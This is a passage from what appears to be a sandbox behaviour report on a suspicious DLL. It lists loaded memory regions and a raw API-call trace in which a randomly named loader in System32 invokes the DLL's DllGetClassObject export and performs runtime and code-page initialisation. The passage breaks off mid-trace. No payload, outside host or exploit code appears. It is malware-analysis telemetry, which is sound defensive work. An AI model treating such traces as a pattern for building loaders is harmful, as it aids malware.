"c:\\windows\\system32\\shlwapi.dll") Region: id = 3042 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3043 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3044 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3045 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3046 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3047 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3048 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3049 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3050 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3051 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3052 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3053 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3054 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3055 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3056 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 3057 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3058 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3059 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3060 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3061 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3062 start_va = 0x400000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3063 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3064 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3065 start_va = 0x5a0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Thread: id = 155 os_tid = 0xe90 [0036.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef82c | out: lpSystemTimeAsFileTime=0x2ef82c*(dwLowDateTime=0xe38cc910, dwHighDateTime=0x1d3dfba)) [0036.682] GetCurrentProcessId () returned 0xe8c [0036.682] GetCurrentThreadId () returned 0xe90 [0036.682] GetTickCount () returned 0x18499 [0036.682] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef824 | out: lpPerformanceCount=0x2ef824*=378734858) returned 1 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.682] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.682] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.682] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.682] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.683] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.684] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.684] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.684] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.684] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.684] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.684] GetCurrentThreadId () returned 0xe90 [0036.684] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.684] GetEnvironmentStringsW () returned 0x4b7998* [0036.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x4909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.685] FreeEnvironmentStringsW (penv=0x4b7998) returned 1 [0036.685] GetStartupInfoA (in: lpStartupInfo=0x2ef77c | out: lpStartupInfo=0x2ef77c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.685] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.685] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.685] SetHandleCount (uNumber=0x20) returned 0x20 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetACP () returned 0x4e4 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.685] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef75c | out: lpCPInfo=0x2ef75c) returned 1 [0036.685] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef228 | out: lpCPInfo=0x2ef228) returned 1 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef1b8 | out: lpCharType=0x2ef1b8) returned 1 [0036.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x2eefa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0036.686] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2ef23c | out: lpCharType=0x2ef23c) returned 1 [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x2eef78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eed68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef53c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåÅöõt÷.", lpUsedDefaultChar=0x0) returned 256 [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef63c, cbMultiByte=256, lpWideCharStr=0x2eef98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eed88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef43c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåÅöõt÷.", lpUsedDefaultChar=0x0) returned 256 [0036.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () 